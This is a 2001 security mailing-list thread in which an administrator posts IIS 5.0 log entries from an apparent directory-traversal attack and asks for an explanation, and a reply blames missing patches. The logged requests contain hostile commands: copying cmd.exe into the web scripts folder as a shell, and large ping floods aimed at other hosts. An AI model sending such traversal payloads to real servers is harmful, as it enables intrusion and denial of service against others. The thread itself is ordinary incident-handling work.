Re: Subject: Unicode Logs with Ping Activity

From: gattacaat_private
Date: Tue Jul 10 2001 - 11:56:05 PDT

  • Next message: Jacques Exelrud: "Weird UDP trafic"

    It would appear that yout IIS webserver is not patched. Sorry I'm not sure 
    of the correct "hotfix" but you can find them at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/current.asp 
    and select "IIS"
    
    502 Bad Gateway 
    "The server, in the role of a gateway or proxy, received an invalid response 
    from the upstream server while attempting to fulfill the request."
    
    http://www.liquidmatrix.org/HTTPsc.htm
    
    hope this helps somewhat,
    gattaca
    
    ----------------------
    liquidmatrix.Org
    ----------------------
    
    ------------------------------------------------------------------------
    ------
    From: myrddin_eat_private 
    Date: Tue, 10 Jul 2001 08:24:50 -0800 (PDT) 
    To: incidentsat_private 
    Subject: Unicode Logs with Ping Activity 
    
    
    Would like someone to help me understand what is going on here... The 502 
    error at the end end of these entries would indcicate failures, wouldn't 
    they? I've been all through the logs on this box, and even thought at every 
    attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
    shows a 502, it is there.
    
    
    I'm looking at the times on the log entries and guessing that this was a 
    manual attack.
    
    
    Also, can someone please explain what is being attempted with these pings?
    aaa.aaa.aaa.aaa
    bbb.bbb.bbb.bbb
    ccc.ccc.ccc.ccc.ccc
    ddd.ddd.ddd.ddd.ddd 
    are all unique addresses.
    
    
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2001-06-19 18:44:15
    #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
    uri-query sc-status cs(User-Agent) 
    2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 
    502 -
    Free, encrypted, secure Web-based email at www.hushmail.com
    
    
    ------------------------------------------------------------------------
    ----
    
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com 
    Free, encrypted, secure Web-based email at www.hushmail.com
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:29:20 PDT